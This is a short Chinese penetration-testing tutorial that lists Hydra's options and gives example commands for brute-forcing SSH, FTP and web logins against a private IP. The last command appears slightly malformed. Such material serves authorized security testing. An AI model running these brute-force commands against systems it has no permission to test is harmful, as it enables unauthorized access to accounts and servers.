本文主要是介绍web渗透测试漏洞流程:红队资产信息收集之单个目标信息收集,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
端口爆破工具用法
Hydra
参数详解:
-R 根据上一次进度继续破解
-S 使用SSL协议连接
-s 指定端口
-l 指定用户名
-L 指定用户名字典(文件)
-p 指定密码破解
-P 指定密码字典(文件)
-e 空密码探测和指定用户密码探测(ns)
-M <FILE>指定目标列表文件一行一条
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
-C 用户名可以用:分割(username:password)可以代替-l username -p password
-o <FILE>输出文件
-t 指定多线程数量,默认为16个线程
-w TIME 设置最大超时的时间,单位秒,默认是30s
-vV 显示详细过程
server 目标IP
service 指定服务名(telnet ftp pop3 mssql mysql ssh ssh2…)
使用案例:
爆破 ssh:22 端口命令:
hydra -L users.txt -P password.txt -t 5 -vV -o ssh.txt -e ns 192.168.0.132 ssh
爆破 Ftp:21 端口命令(指定用户名为root):
hydra -l root -P password.txt -t 5 -vV -o ftp.txt -e ns 192.168.0.132 ftp
get方式提交,破解web登录(指定用户名为admin):
hydra -L user.txt -p password.txt -t 线程 -vV -e ns ip http-g
这篇关于web渗透测试漏洞流程:红队资产信息收集之单个目标信息收集的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
